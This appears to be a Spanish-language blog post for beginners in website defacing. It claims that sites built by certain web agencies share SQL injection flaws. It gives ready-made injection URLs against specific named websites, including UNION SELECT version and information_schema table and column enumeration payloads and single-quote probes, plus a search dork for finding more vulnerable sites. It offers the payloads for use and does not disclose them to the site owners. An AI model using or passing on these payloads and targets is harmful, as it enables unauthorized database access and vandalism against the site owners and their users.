Patron de Bugs
¿De que se trata?
Saludos gente bueno para quienes se estan iniciando en el defacing, pues queria aportarles esta informacion, he encontrado un patron de bugs en algunos desarrollos a nivel web, como asi patron de bugs? si pues veran A veces cuando se encuentra un bug cualquiera, es bueno mirar la casa de desarrollo que implemento el sistema, porq? pues porq si cometio ese error una vez, es probable q tengan ese error en muchas de sus aplicaciones, es a lo q denomino patron de errores o de bugs, o bueno no se si tenga otro nombre, pero ps es mas o menos eso.
Patrones.
Me he dado cuenta q casi todas las aplicaciones web de:
"Powered by Foramen" Tienen sql inyeccion
Ejemplo:
Código:
http://www.analesdemedicina.com/cardiologia/noticia.php?noticia=-82071+union+select+1,@@version--
no siempre es en el mismo componente pero si va por el mismo lado.
Igual sucede con
powered by Maiku
Código:
http://www.otakunomichi.com/ver_articulos.php?articulo=-11+union+select+1,2,concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+170,1
powered by Naranja Azul ®
Código:
http://www.ministeriostorrefuerte.org/eventos.php?codigo=15'
http://gt.unmejorempleo.com/ofertas.php?id=1862'
Powered by: Peruwebmedia.com
Código:
http://www.ciclismoperu.com/ver_titular.php?codigo=101&id=1'
http://www.disarva.com/vercategoria-quickbau.php?idmarca=12&id=55'
De esta ultima si q hay webs. me encontre bastantes.
Sql inyeccion en
dork:inurl:php?id= "Powered by Krátera"
Bueno solo se trata de esto, = a medida q encuentre patrones, pues se podrian ir publicando aqui mismo. no se q tal les suene la idea, ya depues miramos si se reportan o que hacemos con eso.
Saludos.
0 comentarios:
Publicar un comentario